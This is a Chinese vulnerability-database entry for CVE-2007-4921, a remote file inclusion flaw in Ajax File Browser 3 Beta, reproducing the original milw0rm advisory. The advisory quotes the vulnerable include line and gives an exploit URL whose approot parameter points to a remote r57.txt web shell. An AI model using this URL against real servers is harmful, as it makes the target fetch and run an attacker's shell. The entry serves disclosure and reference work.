Ajax File Browser 代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113632 漏洞类型 代码注入
发布时间 2007-09-14 更新时间 2007-09-17
CVE编号 CVE-2007-4921 CNNVD-ID CNNVD-200709-197
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/4405
https://www.securityfocus.com/bid/85397
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200709-197
|漏洞详情
AjaxFileBrowser3Beta中的_includes/settings.inc.php存在PHP远程文件包含漏洞,远程攻击者可以借助approot参数的一个URL执行任意PHP代码。
|漏洞EXP
Ajax File Browser 3 Beta Remote File Inclusion
##############################################

                                                found by the "arfis project"
                                                http://arfis.wordpress.com/

Project Info:
-------------
	Name: Ajax File Browser
	Link: http://sourceforge.net/projects/ajaxfb/
	DL:   http://surfnet.dl.sourceforge.net/sourceforge/ajaxfb/afb-3-beta-2007-08-28.zip


Vulnerability Info:
-------------------
	File: _includes/settings.inc.php
	Line: 12
	Code: require_once($approot. _includes/functions_file.inc.php );


Exploit Example:
----------------
	http://localhost/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=http://localhost/r57.txt?


About arfis:
------------
	"arfis" stands for "automated Remote File Inclusion search". It's a perl script
	that automatically download and extract PHP projects from sourceforge.net. It then
	checks the project for RFI vulnerabilities, if found one it post's it to the arfis-
	blog, or database if you want to call it like that. Feel free to come around and
	find your own RFI:
	                   http://arfis.wordpress.com/

# milw0rm.com [2007-09-14]
|受影响的产品
Ajax File Browser 3 Beta
|参考资料

来源:XF
名称:ajax-settingsinc-file-include(36604)
链接:http://xforce.iss.net/xforce/xfdb/36604
来源:MILW0RM
名称:4405
链接:http://www.milw0rm.com/exploits/4405
来源:OSVDB
名称:38970
链接:http://osvdb.org/38970
来源:VUPEN
名称:ADV-2007-3175
链接:http://www.frsirt.com/english/advisories/2007/3175
来源:MISC
链接:http://arfis.wordpress.com/2007/09/14/rfi-02-ajax-file-browser/